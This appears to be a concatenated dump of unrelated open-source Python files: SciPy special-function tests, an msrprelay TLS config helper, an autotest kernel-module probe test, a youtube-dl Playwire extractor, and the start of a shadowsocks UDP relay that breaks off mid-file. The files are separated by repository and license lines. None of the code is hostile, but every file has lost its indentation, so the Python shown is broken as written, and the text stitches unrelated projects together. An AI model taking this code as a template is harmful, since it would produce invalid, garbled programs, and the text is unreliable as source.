def _cephes_vs_amos_points(self):
"""Yield points at which to compare Cephes implementation to AMOS"""
# check several points, including large-amplitude ones
for v in [-120, -100.3, -20., -10., -1., -.5,
0., 1., 12.49, 120., 301]:
for z in [-1300, -11, -10, -1, 1., 10., 200.5, 401., 600.5,
700.6, 1300, 10003]:
yield v, z
# check half-integers; these are problematic points at least
# for cephes/iv
for v in 0.5 + arange(-60, 60):
yield v, 3.5
def check_cephes_vs_amos(self, f1, f2, rtol=1e-11, atol=0, skip=None):
for v, z in self._cephes_vs_amos_points():
if skip is not None and skip(v, z):
continue
c1, c2, c3 = f1(v, z), f1(v,z+0j), f2(int(v), z)
if np.isinf(c1):
assert_(np.abs(c2) >= 1e300, (v, z))
elif np.isnan(c1):
assert_(c2.imag != 0, (v, z))
else:
assert_tol_equal(c1, c2, err_msg=(v, z), rtol=rtol, atol=atol)
if v == int(v):
assert_tol_equal(c3, c2, err_msg=(v, z),
rtol=rtol, atol=atol)
def test_jv_cephes_vs_amos(self):
self.check_cephes_vs_amos(special.jv, special.jn, rtol=1e-10, atol=1e-305)
@dec.knownfailureif(True,
"cephes/yv is not eps accurate for large orders on "
"all platforms, and has nan/inf issues")
def test_yv_cephes_vs_amos(self):
self.check_cephes_vs_amos(special.yv, special.yn, rtol=1e-11, atol=1e-305)
def test_yv_cephes_vs_amos_only_small_orders(self):
skipper = lambda v, z: (abs(v) > 50)
self.check_cephes_vs_amos(special.yv, special.yn, rtol=1e-11, atol=1e-305, skip=skipper)
def test_iv_cephes_vs_amos(self):
olderr = np.seterr(all='ignore')
try:
self.check_cephes_vs_amos(special.iv, special.iv, rtol=5e-9, atol=1e-305)
finally:
np.seterr(**olderr)
@dec.slow
def test_iv_cephes_vs_amos_mass_test(self):
N = 1000000
np.random.seed(1)
v = np.random.pareto(0.5, N) * (-1)**np.random.randint(2, size=N)
x = np.random.pareto(0.2, N) * (-1)**np.random.randint(2, size=N)
imsk = (np.random.randint(8, size=N) == 0)
v[imsk] = v.astype(int)
c1 = special.iv(v, x)
c2 = special.iv(v, x+0j)
# deal with differences in the inf cutoffs
c1[abs(c1) > 1e300] = np.inf
c2[abs(c2) > 1e300] = np.inf
dc = abs(c1/c2 - 1)
dc[np.isnan(dc)] = 0
k = np.argmax(dc)
# Most error apparently comes from AMOS and not our implementation;
# there are some problems near integer orders there
assert_(dc[k] < 1e-9, (v[k], x[k], special.iv(v[k], x[k]), special.iv(v[k], x[k]+0j)))
def test_kv_cephes_vs_amos(self):
#self.check_cephes_vs_amos(kv, kn, rtol=1e-9, atol=1e-305)
self.check_cephes_vs_amos(special.kv, special.kv, rtol=1e-9, atol=1e-305)
def test_ticket_623(self):
assert_tol_equal(special.jv(3, 4), 0.43017147387562193)
assert_tol_equal(special.jv(301, 1300), 0.0183487151115275)
assert_tol_equal(special.jv(301, 1296.0682), -0.0224174325312048)
def test_ticket_853(self):
"""Negative-order Bessels"""
# cephes
assert_tol_equal(special.jv(-1, 1 ), -0.4400505857449335)
assert_tol_equal(special.jv(-2, 1 ), 0.1149034849319005)
assert_tol_equal(special.yv(-1, 1 ), 0.7812128213002887)
assert_tol_equal(special.yv(-2, 1 ), -1.650682606816255)
assert_tol_equal(special.iv(-1, 1 ), 0.5651591039924851)
assert_tol_equal(special.iv(-2, 1 ), 0.1357476697670383)
assert_tol_equal(special.kv(-1, 1 ), 0.6019072301972347)
assert_tol_equal(special.kv(-2, 1 ), 1.624838898635178)
assert_tol_equal(special.jv(-0.5, 1 ), 0.43109886801837607952)
assert_tol_equal(special.yv(-0.5, 1 ), 0.6713967071418031)
assert_tol_equal(special.iv(-0.5, 1 ), 1.231200214592967)
assert_tol_equal(special.kv(-0.5, 1 ), 0.4610685044478945)
# amos
assert_tol_equal(special.jv(-1, 1+0j), -0.4400505857449335)
assert_tol_equal(special.jv(-2, 1+0j), 0.1149034849319005)
assert_tol_equal(special.yv(-1, 1+0j), 0.7812128213002887)
assert_tol_equal(special.yv(-2, 1+0j), -1.650682606816255)
assert_tol_equal(special.iv(-1, 1+0j), 0.5651591039924851)
assert_tol_equal(special.iv(-2, 1+0j), 0.1357476697670383)
assert_tol_equal(special.kv(-1, 1+0j), 0.6019072301972347)
assert_tol_equal(special.kv(-2, 1+0j), 1.624838898635178)
assert_tol_equal(special.jv(-0.5, 1+0j), 0.43109886801837607952)
assert_tol_equal(special.jv(-0.5, 1+1j), 0.2628946385649065-0.827050182040562j)
assert_tol_equal(special.yv(-0.5, 1+0j), 0.6713967071418031)
assert_tol_equal(special.yv(-0.5, 1+1j), 0.967901282890131+0.0602046062142816j)
assert_tol_equal(special.iv(-0.5, 1+0j), 1.231200214592967)
assert_tol_equal(special.iv(-0.5, 1+1j), 0.77070737376928+0.39891821043561j)
assert_tol_equal(special.kv(-0.5, 1+0j), 0.4610685044478945)
assert_tol_equal(special.kv(-0.5, 1+1j), 0.06868578341999-0.38157825981268j)
assert_tol_equal(special.jve(-0.5,1+0.3j), special.jv(-0.5, 1+0.3j)*exp(-0.3))
assert_tol_equal(special.yve(-0.5,1+0.3j), special.yv(-0.5, 1+0.3j)*exp(-0.3))
assert_tol_equal(special.ive(-0.5,0.3+1j), special.iv(-0.5, 0.3+1j)*exp(-0.3))
assert_tol_equal(special.kve(-0.5,0.3+1j), special.kv(-0.5, 0.3+1j)*exp(0.3+1j))
assert_tol_equal(special.hankel1(-0.5, 1+1j), special.jv(-0.5, 1+1j) + 1j*special.yv(-0.5,1+1j))
assert_tol_equal(special.hankel2(-0.5, 1+1j), special.jv(-0.5, 1+1j) - 1j*special.yv(-0.5,1+1j))
def test_ticket_854(self):
"""Real-valued Bessel domains"""
assert_(isnan(special.jv(0.5, -1)))
assert_(isnan(special.iv(0.5, -1)))
assert_(isnan(special.yv(0.5, -1)))
assert_(isnan(special.yv(1, -1)))
assert_(isnan(special.kv(0.5, -1)))
assert_(isnan(special.kv(1, -1)))
assert_(isnan(special.jve(0.5, -1)))
assert_(isnan(special.ive(0.5, -1)))
assert_(isnan(special.yve(0.5, -1)))
assert_(isnan(special.yve(1, -1)))
assert_(isnan(special.kve(0.5, -1)))
assert_(isnan(special.kve(1, -1)))
assert_(isnan(special.airye(-1)[0:2]).all(), special.airye(-1))
assert_(not isnan(special.airye(-1)[2:4]).any(), special.airye(-1))
def test_ticket_503(self):
"""Real-valued Bessel I overflow"""
assert_tol_equal(special.iv(1, 700), 1.528500390233901e302)
assert_tol_equal(special.iv(1000, 1120), 1.301564549405821e301)
def test_iv_hyperg_poles(self):
assert_tol_equal(special.iv(-0.5, 1), 1.231200214592967)
def iv_series(self, v, z, n=200):
k = arange(0, n).astype(float_)
r = (v+2*k)*log(.5*z) - special.gammaln(k+1) - special.gammaln(v+k+1)
r[isnan(r)] = inf
r = exp(r)
err = abs(r).max() * finfo(float_).eps * n + abs(r[-1])*10
return r.sum(), err
def test_i0_series(self):
for z in [1., 10., 200.5]:
value, err = self.iv_series(0, z)
assert_tol_equal(special.i0(z), value, atol=err, err_msg=z)
def test_i1_series(self):
for z in [1., 10., 200.5]:
value, err = self.iv_series(1, z)
assert_tol_equal(special.i1(z), value, atol=err, err_msg=z)
def test_iv_series(self):
for v in [-20., -10., -1., 0., 1., 12.49, 120.]:
for z in [1., 10., 200.5, -1+2j]:
value, err = self.iv_series(v, z)
assert_tol_equal(special.iv(v, z), value, atol=err, err_msg=(v, z))
def test_i0(self):
values = [[0.0, 1.0],
[1e-10, 1.0],
[0.1, 0.9071009258],
[0.5, 0.6450352706],
[1.0, 0.4657596077],
[2.5, 0.2700464416],
[5.0, 0.1835408126],
[20.0, 0.0897803119],
]
for i, (x, v) in enumerate(values):
cv = special.i0(x) * exp(-x)
assert_almost_equal(cv, v, 8, err_msg='test #%d' % i)
def test_i0e(self):
oize = special.i0e(.1)
oizer = special.ive(0,.1)
assert_almost_equal(oize,oizer,8)
def test_i1(self):
values = [[0.0, 0.0],
[1e-10, 0.4999999999500000e-10],
[0.1, 0.0452984468],
[0.5, 0.1564208032],
[1.0, 0.2079104154],
[5.0, 0.1639722669],
[20.0, 0.0875062222],
]
for i, (x, v) in enumerate(values):
cv = special.i1(x) * exp(-x)
assert_almost_equal(cv, v, 8, err_msg='test #%d' % i)
def test_i1e(self):
oi1e = special.i1e(.1)
oi1er = special.ive(1,.1)
assert_almost_equal(oi1e,oi1er,8)
def test_iti0k0(self):
iti0 = array(special.iti0k0(5))
assert_array_almost_equal(iti0,array([31.848667776169801, 1.5673873907283657]),5)
def test_it2i0k0(self):
it2k = special.it2i0k0(.1)
assert_array_almost_equal(it2k,array([0.0012503906973464409, 3.3309450354686687]),6)
def test_iv(self):
iv1 = special.iv(0,.1)*exp(-.1)
assert_almost_equal(iv1,0.90710092578230106,10)
def test_negv_ive(self):
assert_equal(special.ive(3,2), special.ive(-3,2))
def test_ive(self):
ive1 = special.ive(0,.1)
iv1 = special.iv(0,.1)*exp(-.1)
assert_almost_equal(ive1,iv1,10)
def test_ivp0(self):
assert_almost_equal(special.iv(1,2), special.ivp(0,2), 10)
def test_ivp(self):
y=(special.iv(0,2) + special.iv(2,2))/2
x = special.ivp(1,2)
assert_almost_equal(x,y,10)
class TestLaguerre(TestCase):
def test_laguerre(self):
lag0 = special.laguerre(0)
lag1 = special.laguerre(1)
lag2 = special.laguerre(2)
lag3 = special.laguerre(3)
lag4 = special.laguerre(4)
lag5 = special.laguerre(5)
assert_array_almost_equal(lag0.c,[1],13)
assert_array_almost_equal(lag1.c,[-1,1],13)
assert_array_almost_equal(lag2.c,array([1,-4,2])/2.0,13)
assert_array_almost_equal(lag3.c,array([-1,9,-18,6])/6.0,13)
assert_array_almost_equal(lag4.c,array([1,-16,72,-96,24])/24.0,13)
assert_array_almost_equal(lag5.c,array([-1,25,-200,600,-600,120])/120.0,13)
def test_genlaguerre(self):
k = 5*rand()-0.9
lag0 = special.genlaguerre(0,k)
lag1 = special.genlaguerre(1,k)
lag2 = special.genlaguerre(2,k)
lag3 = special.genlaguerre(3,k)
assert_equal(lag0.c,[1])
assert_equal(lag1.c,[-1,k+1])
assert_almost_equal(lag2.c,array([1,-2*(k+2),(k+1.)*(k+2.)])/2.0)
assert_almost_equal(lag3.c,array([-1,3*(k+3),-3*(k+2)*(k+3),(k+1)*(k+2)*(k+3)])/6.0)
# Base polynomials come from Abrahmowitz and Stegan
class TestLegendre(TestCase):
def test_legendre(self):
leg0 = special.legendre(0)
leg1 = special.legendre(1)
leg2 = special.legendre(2)
leg3 = special.legendre(3)
leg4 = special.legendre(4)
leg5 = special.legendre(5)
assert_equal(leg0.c,[1])
assert_equal(leg1.c,[1,0])
assert_equal(leg2.c,array([3,0,-1])/2.0)
assert_almost_equal(leg3.c,array([5,0,-3,0])/2.0)
assert_almost_equal(leg4.c,array([35,0,-30,0,3])/8.0)
assert_almost_equal(leg5.c,array([63,0,-70,0,15,0])/8.0)
class TestLambda(TestCase):
def test_lmbda(self):
lam = special.lmbda(1,.1)
lamr = (array([special.jn(0,.1), 2*special.jn(1,.1)/.1]),
array([special.jvp(0,.1), -2*special.jv(1,.1)/.01 + 2*special.jvp(1,.1)/.1]))
assert_array_almost_equal(lam,lamr,8)
class TestLog1p(TestCase):
def test_log1p(self):
l1p = (special.log1p(10), special.log1p(11), special.log1p(12))
l1prl = (log(11), log(12), log(13))
assert_array_almost_equal(l1p,l1prl,8)
def test_log1pmore(self):
l1pm = (special.log1p(1), special.log1p(1.1), special.log1p(1.2))
l1pmrl = (log(2),log(2.1),log(2.2))
assert_array_almost_equal(l1pm,l1pmrl,8)
class TestLegendreFunctions(TestCase):
def test_lpmn(self):
lp = special.lpmn(0,2,.5)
assert_array_almost_equal(lp,(array([ [ 1.00000 ,
0.50000,
-0.12500]]),
array([ [ 0.00000 ,
1.00000 ,
1.50000]])),4)
def test_lpn(self):
lpnf = special.lpn(2,.5)
assert_array_almost_equal(lpnf,(array( [ 1.00000 ,
0.50000,
-0.12500]),
array( [ 0.00000 ,
1.00000 ,
1.50000])),4)
def test_lpmv(self):
lp = special.lpmv(0,2,.5)
assert_almost_equal(lp,-0.125,7)
lp = special.lpmv(0,40,.001)
assert_almost_equal(lp,0.1252678976534484,7)
# XXX: this is outside the domain of the current implementation,
# so ensure it returns a NaN rather than a wrong answer.
olderr = np.seterr(all='ignore')
try:
lp = special.lpmv(-1,-1,.001)
finally:
np.seterr(**olderr)
assert_(lp != 0 or np.isnan(lp))
def test_lqmn(self):
lqmnf = special.lqmn(0,2,.5)
lqmnf = special.lqmn(0,2,.5)
lqf = special.lqn(2,.5)
assert_array_almost_equal(lqmnf[0][0],lqf[0],4)
assert_array_almost_equal(lqmnf[1][0],lqf[1],4)
def test_lqmn_shape(self):
a, b = special.lqmn(4, 4, 1.1)
assert_equal(a.shape, (5, 5))
assert_equal(b.shape, (5, 5))
a, b = special.lqmn(4, 0, 1.1)
assert_equal(a.shape, (5, 1))
assert_equal(b.shape, (5, 1))
def test_lqn(self):
lqf = special.lqn(2,.5)
assert_array_almost_equal(lqf,(array([ 0.5493, -0.7253, -0.8187]),
array([ 1.3333, 1.216 , -0.8427])),4)
class TestMathieu(TestCase):
def test_mathieu_a(self):
pass
def test_mathieu_even_coef(self):
mc = special.mathieu_even_coef(2,5)
#Q not defined broken and cannot figure out proper reporting order
def test_mathieu_odd_coef(self):
pass
#same problem as above
class TestFresnelIntegral(TestCase):
def test_modfresnelp(self):
pass
def test_modfresnelm(self):
pass
class TestOblCvSeq(TestCase):
def test_obl_cv_seq(self):
obl = special.obl_cv_seq(0,3,1)
assert_array_almost_equal(obl,array([ -0.348602,
1.393206,
5.486800,
11.492120]),5)
class TestParabolicCylinder(TestCase):
def test_pbdn_seq(self):
pb = special.pbdn_seq(1,.1)
assert_array_almost_equal(pb,(array([ 0.9975,
0.0998]),
array([-0.0499,
0.9925])),4)
def test_pbdv(self):
pbv = special.pbdv(1,.2)
derrl = 1/2*(.2)*special.pbdv(1,.2)[0] - special.pbdv(0,.2)[0]
def test_pbdv_seq(self):
pbn = special.pbdn_seq(1,.1)
pbv = special.pbdv_seq(1,.1)
assert_array_almost_equal(pbv,(real(pbn[0]),real(pbn[1])),4)
def test_pbdv_points(self):
# simple case
eta = np.linspace(-10, 10, 5)
z = 2**(eta/2)*np.sqrt(np.pi)/special.gamma(.5-.5*eta)
assert_tol_equal(special.pbdv(eta, 0.)[0], z, rtol=1e-14, atol=1e-14)
# some points
assert_tol_equal(special.pbdv(10.34, 20.44)[0], 1.3731383034455e-32, rtol=1e-12)
assert_tol_equal(special.pbdv(-9.53, 3.44)[0], 3.166735001119246e-8, rtol=1e-12)
def test_pbdv_gradient(self):
x = np.linspace(-4, 4, 8)[:,None]
eta = np.linspace(-10, 10, 5)[None,:]
p = special.pbdv(eta, x)
eps = 1e-7 + 1e-7*abs(x)
dp = (special.pbdv(eta, x + eps)[0] - special.pbdv(eta, x - eps)[0]) / eps / 2.
assert_tol_equal(p[1], dp, rtol=1e-6, atol=1e-6)
def test_pbvv_gradient(self):
x = np.linspace(-4, 4, 8)[:,None]
eta = np.linspace(-10, 10, 5)[None,:]
p = special.pbvv(eta, x)
eps = 1e-7 + 1e-7*abs(x)
dp = (special.pbvv(eta, x + eps)[0] - special.pbvv(eta, x - eps)[0]) / eps / 2.
assert_tol_equal(p[1], dp, rtol=1e-6, atol=1e-6)
class TestPolygamma(TestCase):
# from Table 6.2 (pg. 271) of A&S
def test_polygamma(self):
poly2 = special.polygamma(2,1)
poly3 = special.polygamma(3,1)
assert_almost_equal(poly2,-2.4041138063,10)
assert_almost_equal(poly3,6.4939394023,10)
class TestProCvSeq(TestCase):
def test_pro_cv_seq(self):
prol = special.pro_cv_seq(0,3,1)
assert_array_almost_equal(prol,array([ 0.319000,
2.593084,
6.533471,
12.514462]),5)
class TestPsi(TestCase):
def test_psi(self):
ps = special.psi(1)
assert_almost_equal(ps,-0.57721566490153287,8)
class TestRadian(TestCase):
def test_radian(self):
rad = special.radian(90,0,0)
assert_almost_equal(rad,pi/2.0,5)
def test_radianmore(self):
rad1 = special.radian(90,1,60)
assert_almost_equal(rad1,pi/2+0.0005816135199345904,5)
class TestRiccati(TestCase):
def test_riccati_jn(self):
jnrl = (special.sph_jn(1,.2)[0]*.2,special.sph_jn(1,.2)[0]+special.sph_jn(1,.2)[1]*.2)
ricjn = special.riccati_jn(1,.2)
assert_array_almost_equal(ricjn,jnrl,8)
def test_riccati_yn(self):
ynrl = (special.sph_yn(1,.2)[0]*.2,special.sph_yn(1,.2)[0]+special.sph_yn(1,.2)[1]*.2)
ricyn = special.riccati_yn(1,.2)
assert_array_almost_equal(ricyn,ynrl,8)
class TestRound(TestCase):
def test_round(self):
rnd = map(int,(special.round(10.1),special.round(10.4),special.round(10.5),special.round(10.6)))
# Note: According to the documentation, scipy.special.round is
# supposed to round to the nearest even number if the fractional
# part is exactly 0.5. On some platforms, this does not appear
# to work and thus this test may fail. However, this unit test is
# correctly written.
rndrl = (10,10,10,11)
assert_array_equal(rnd,rndrl)
def test_sph_harm():
# Tests derived from tables in
# http://en.wikipedia.org/wiki/Table_of_spherical_harmonics
sh = special.sph_harm
pi = np.pi
exp = np.exp
sqrt = np.sqrt
sin = np.sin
cos = np.cos
yield (assert_array_almost_equal, sh(0,0,0,0),
0.5/sqrt(pi))
yield (assert_array_almost_equal, sh(-2,2,0.,pi/4),
0.25*sqrt(15./(2.*pi))*
(sin(pi/4))**2.)
yield (assert_array_almost_equal, sh(-2,2,0.,pi/2),
0.25*sqrt(15./(2.*pi)))
yield (assert_array_almost_equal, sh(2,2,pi,pi/2),
0.25*sqrt(15/(2.*pi))*
exp(0+2.*pi*1j)*sin(pi/2.)**2.)
yield (assert_array_almost_equal, sh(2,4,pi/4.,pi/3.),
(3./8.)*sqrt(5./(2.*pi))*
exp(0+2.*pi/4.*1j)*
sin(pi/3.)**2.*
(7.*cos(pi/3.)**2.-1))
yield (assert_array_almost_equal, sh(4,4,pi/8.,pi/6.),
(3./16.)*sqrt(35./(2.*pi))*
exp(0+4.*pi/8.*1j)*sin(pi/6.)**4.)
class TestSpherical(TestCase):
def test_sph_harm(self):
# see test_sph_harm function
pass
def test_sph_in(self):
i1n = special.sph_in(1,.2)
inp0 = (i1n[0][1])
inp1 = (i1n[0][0] - 2.0/0.2 * i1n[0][1])
assert_array_almost_equal(i1n[0],array([1.0066800127054699381,
0.066933714568029540839]),12)
assert_array_almost_equal(i1n[1],[inp0,inp1],12)
def test_sph_inkn(self):
spikn = r_[special.sph_in(1,.2) + special.sph_kn(1,.2)]
inkn = r_[special.sph_inkn(1,.2)]
assert_array_almost_equal(inkn,spikn,10)
def test_sph_jn(self):
s1 = special.sph_jn(2,.2)
s10 = -s1[0][1]
s11 = s1[0][0]-2.0/0.2*s1[0][1]
s12 = s1[0][1]-3.0/0.2*s1[0][2]
assert_array_almost_equal(s1[0],[0.99334665397530607731,
0.066400380670322230863,
0.0026590560795273856680],12)
assert_array_almost_equal(s1[1],[s10,s11,s12],12)
def test_sph_jnyn(self):
jnyn = r_[special.sph_jn(1,.2) + special.sph_yn(1,.2)] # tuple addition
jnyn1 = r_[special.sph_jnyn(1,.2)]
assert_array_almost_equal(jnyn1,jnyn,9)
def test_sph_kn(self):
kn = special.sph_kn(2,.2)
kn0 = -kn[0][1]
kn1 = -kn[0][0]-2.0/0.2*kn[0][1]
kn2 = -kn[0][1]-3.0/0.2*kn[0][2]
assert_array_almost_equal(kn[0],[6.4302962978445670140,
38.581777787067402086,
585.15696310385559829],12)
assert_array_almost_equal(kn[1],[kn0,kn1,kn2],9)
def test_sph_yn(self):
sy1 = special.sph_yn(2,.2)[0][2]
sy2 = special.sph_yn(0,.2)[0][0]
sphpy = (special.sph_yn(1,.2)[0][0]-2*special.sph_yn(2,.2)[0][2])/3 #correct derivative value
assert_almost_equal(sy1,-377.52483,5)#previous values in the system
assert_almost_equal(sy2,-4.9003329,5)
sy3 = special.sph_yn(1,.2)[1][1]
assert_almost_equal(sy3,sphpy,4) #compare correct derivative val. (correct =-system val).
class TestStruve(object):
def _series(self, v, z, n=100):
"""Compute Struve function & error estimate from its power series."""
k = arange(0, n)
r = (-1)**k * (.5*z)**(2*k+v+1)/special.gamma(k+1.5)/special.gamma(k+v+1.5)
err = abs(r).max() * finfo(float_).eps * n
return r.sum(), err
def test_vs_series(self):
"""Check Struve function versus its power series"""
for v in [-20, -10, -7.99, -3.4, -1, 0, 1, 3.4, 12.49, 16]:
for z in [1, 10, 19, 21, 30]:
value, err = self._series(v, z)
assert_tol_equal(special.struve(v, z), value, rtol=0, atol=err), (v, z)
def test_some_values(self):
assert_tol_equal(special.struve(-7.99, 21), 0.0467547614113, rtol=1e-7)
assert_tol_equal(special.struve(-8.01, 21), 0.0398716951023, rtol=1e-8)
assert_tol_equal(special.struve(-3.0, 200), 0.0142134427432, rtol=1e-12)
assert_tol_equal(special.struve(-8.0, -41), 0.0192469727846, rtol=1e-11)
assert_equal(special.struve(-12, -41), -special.struve(-12, 41))
assert_equal(special.struve(+12, -41), -special.struve(+12, 41))
assert_equal(special.struve(-11, -41), +special.struve(-11, 41))
assert_equal(special.struve(+11, -41), +special.struve(+11, 41))
assert_(isnan(special.struve(-7.1, -1)))
assert_(isnan(special.struve(-10.1, -1)))
def test_regression_679(self):
"""Regression test for #679"""
assert_tol_equal(special.struve(-1.0, 20 - 1e-8), special.struve(-1.0, 20 + 1e-8))
assert_tol_equal(special.struve(-2.0, 20 - 1e-8), special.struve(-2.0, 20 + 1e-8))
assert_tol_equal(special.struve(-4.3, 20 - 1e-8), special.struve(-4.3, 20 + 1e-8))
def test_chi2_smalldf():
assert_almost_equal(special.chdtr(0.6,3), 0.957890536704110)
def test_chi2c_smalldf():
assert_almost_equal(special.chdtrc(0.6,3), 1-0.957890536704110)
def test_chi2_inv_smalldf():
assert_almost_equal(special.chdtri(0.6,1-0.957890536704110), 3)
if __name__ == "__main__":
run_module_suite()
| gpl-3.0 |
AGProjects/msrprelay | msrp/tls.py | 1 | 1533 |
__all__ = ['Certificate', 'PrivateKey']
from gnutls.crypto import X509Certificate, X509PrivateKey
from application.process import process
class _FileError(Exception): pass
def file_content(file):
path = process.configuration.file(file)
if path is None:
raise _FileError("File '%s' does not exist" % file)
try:
f = open(path, 'rt')
except:
raise _FileError("File '%s' could not be open" % file)
try:
return f.read()
finally:
f.close()
class Certificate(object):
"""Configuration data type. Used to create a gnutls.crypto.X509Certificate object
from a file given in the configuration file."""
def __new__(cls, value):
if isinstance(value, str):
try:
return X509Certificate(file_content(value))
except Exception as e:
raise ValueError("Certificate file '%s' could not be loaded: %s" % (value, str(e)))
else:
raise TypeError('value should be a string')
class PrivateKey(object):
"""Configuration data type. Used to create a gnutls.crypto.X509PrivateKey object
from a file given in the configuration file."""
def __new__(cls, value):
if isinstance(value, str):
try:
return X509PrivateKey(file_content(value))
except Exception as e:
raise ValueError("Private key file '%s' could not be loaded: %s" % (value, str(e)))
else:
raise TypeError('value should be a string')
| gpl-2.0 |
ldoktor/autotest | client/virt/tests/module_probe.py | 2 | 1885 | import re, commands, logging, os
from autotest.client.shared import error, utils
from autotest.client.virt import base_installer
def run_module_probe(test, params, env):
"""
load/unload kernel modules several times.
The test can run in two modes:
- based on previous 'build' test: in case kernel modules were installed by a
'build' test, we used the modules installed by the previous test.
- based on own params: if no previous 'build' test was run,
we assume pre-installed kernel modules.
"""
installer_object = env.previous_installer()
if installer_object is None:
installer_object = base_installer.NoopInstaller('noop',
'module_probe',
test, params)
logging.debug('installer object: %r', installer_object)
# unload the modules before starting:
installer_object.unload_modules()
load_count = int(params.get("load_count", 100))
try:
for i in range(load_count):
try:
installer_object.load_modules()
except Exception,e:
raise error.TestFail("Failed to load modules [%r]: %s" %
(installer_object.module_list, e))
# unload using rmmod directly because utils.unload_module() (used by
# installer) does too much (runs lsmod, checks for dependencies),
# and we want to run the loop as fast as possible.
for mod in reversed(installer_object.module_list):
r = utils.system("rmmod %s" % (mod), ignore_status=True)
if r <> 0:
raise error.TestFail("Failed to unload module %s. "
"exit status: %d" % (mod, r))
finally:
installer_object.load_modules()
| gpl-2.0 |
nyuszika7h/youtube-dl | youtube_dl/extractor/playwire.py | 64 | 2408 | from __future__ import unicode_literals
import re
from .common import InfoExtractor
from ..utils import (
dict_get,
float_or_none,
)
class PlaywireIE(InfoExtractor):
_VALID_URL = r'https?://(?:config|cdn)\.playwire\.com(?:/v2)?/(?P<publisher_id>\d+)/(?:videos/v2|embed|config)/(?P<id>\d+)'
_TESTS = [{
'url': 'http://config.playwire.com/14907/videos/v2/3353705/player.json',
'md5': 'e6398701e3595888125729eaa2329ed9',
'info_dict': {
'id': '3353705',
'ext': 'mp4',
'title': 'S04_RM_UCL_Rus',
'thumbnail': r're:^https?://.*\.png$',
'duration': 145.94,
},
}, {
# m3u8 in f4m
'url': 'http://config.playwire.com/21772/videos/v2/4840492/zeus.json',
'info_dict': {
'id': '4840492',
'ext': 'mp4',
'title': 'ITV EL SHOW FULL',
},
'params': {
# m3u8 download
'skip_download': True,
},
}, {
# Multiple resolutions while bitrates missing
'url': 'http://cdn.playwire.com/11625/embed/85228.html',
'only_matching': True,
}, {
'url': 'http://config.playwire.com/12421/videos/v2/3389892/zeus.json',
'only_matching': True,
}, {
'url': 'http://cdn.playwire.com/v2/12342/config/1532636.json',
'only_matching': True,
}]
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
publisher_id, video_id = mobj.group('publisher_id'), mobj.group('id')
player = self._download_json(
'http://config.playwire.com/%s/videos/v2/%s/zeus.json' % (publisher_id, video_id),
video_id)
title = player['settings']['title']
duration = float_or_none(player.get('duration'), 1000)
content = player['content']
thumbnail = content.get('poster')
src = content['media']['f4m']
formats = self._extract_f4m_formats(src, video_id, m3u8_id='hls')
for a_format in formats:
if not dict_get(a_format, ['tbr', 'width', 'height']):
a_format['quality'] = 1 if '-hd.' in a_format['url'] else 0
self._sort_formats(formats)
return {
'id': video_id,
'title': title,
'thumbnail': thumbnail,
'duration': duration,
'formats': formats,
}
| unlicense |
beermix/source | package/lienol/luci-app-ssr-mudb-server/root/usr/share/ssr_mudb_server/shadowsocks/udprelay.py | 2 | 25774 | #!/usr/bin/python3
# -*- coding: utf-8 -*-
#
# Copyright 2015 clowwindy
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# SOCKS5 UDP Request
# +----+------+------+----------+----------+----------+
# |RSV | FRAG | ATYP | DST.ADDR | DST.PORT | DATA |
# +----+------+------+----------+----------+----------+
# | 2 | 1 | 1 | Variable | 2 | Variable |
# +----+------+------+----------+----------+----------+
# SOCKS5 UDP Response
# +----+------+------+----------+----------+----------+
# |RSV | FRAG | ATYP | DST.ADDR | DST.PORT | DATA |
# +----+------+------+----------+----------+----------+
# | 2 | 1 | 1 | Variable | 2 | Variable |
# +----+------+------+----------+----------+----------+
# shadowsocks UDP Request (before encrypted)
# +------+----------+----------+----------+
# | ATYP | DST.ADDR | DST.PORT | DATA |
# +------+----------+----------+----------+
# | 1 | Variable | 2 | Variable |
# +------+----------+----------+----------+
# shadowsocks UDP Response (before encrypted)
# +------+----------+----------+----------+
# | ATYP | DST.ADDR | DST.PORT | DATA |
# +------+----------+----------+----------+
# | 1 | Variable | 2 | Variable |
# +------+----------+----------+----------+
# shadowsocks UDP Request and Response (after encrypted)
# +-------+--------------+
# | IV | PAYLOAD |
# +-------+--------------+
# | Fixed | Variable |
# +-------+--------------+
# HOW TO NAME THINGS
# ------------------
# `dest` means destination server, which is from DST fields in the SOCKS5
# request
# `local` means local server of shadowsocks
# `remote` means remote server of shadowsocks
# `client` means UDP clients that connects to other servers
# `server` means the UDP server that handles user requests
from __future__ import absolute_import, division, print_function, \
with_statement
import time
import socket
import logging
import struct
import errno
import random
import binascii
import traceback
import threading
from shadowsocks import encrypt, obfs, eventloop, lru_cache, common, shell
from shadowsocks.common import pre_parse_header, parse_header, pack_addr
# for each handler, we have 2 stream directions:
# upstream: from client to server direction
# read local and write to remote
# downstream: from server to client direction
# read remote and write to local
STREAM_UP = 0
STREAM_DOWN = 1
# for each stream, it's waiting for reading, or writing, or both
WAIT_STATUS_INIT = 0
WAIT_STATUS_READING = 1
WAIT_STATUS_WRITING = 2
WAIT_STATUS_READWRITING = WAIT_STATUS_READING | WAIT_STATUS_WRITING
BUF_SIZE = 65536
DOUBLE_SEND_BEG_IDS = 16
POST_MTU_MIN = 500
POST_MTU_MAX = 1400
SENDING_WINDOW_SIZE = 8192
STAGE_INIT = 0
STAGE_RSP_ID = 1
STAGE_DNS = 2
STAGE_CONNECTING = 3
STAGE_STREAM = 4
STAGE_DESTROYED = -1
CMD_CONNECT = 0
CMD_RSP_CONNECT = 1
CMD_CONNECT_REMOTE = 2
CMD_RSP_CONNECT_REMOTE = 3
CMD_POST = 4
CMD_SYN_STATUS = 5
CMD_POST_64 = 6
CMD_SYN_STATUS_64 = 7
CMD_DISCONNECT = 8
CMD_VER_STR = b"\x08"
RSP_STATE_EMPTY = b""
RSP_STATE_REJECT = b"\x00"
RSP_STATE_CONNECTED = b"\x01"
RSP_STATE_CONNECTEDREMOTE = b"\x02"
RSP_STATE_ERROR = b"\x03"
RSP_STATE_DISCONNECT = b"\x04"
RSP_STATE_REDIRECT = b"\x05"
def client_key(source_addr, server_af):
# notice this is server af, not dest af
return '%s:%s:%d' % (source_addr[0], source_addr[1], server_af)
class UDPRelay(object):
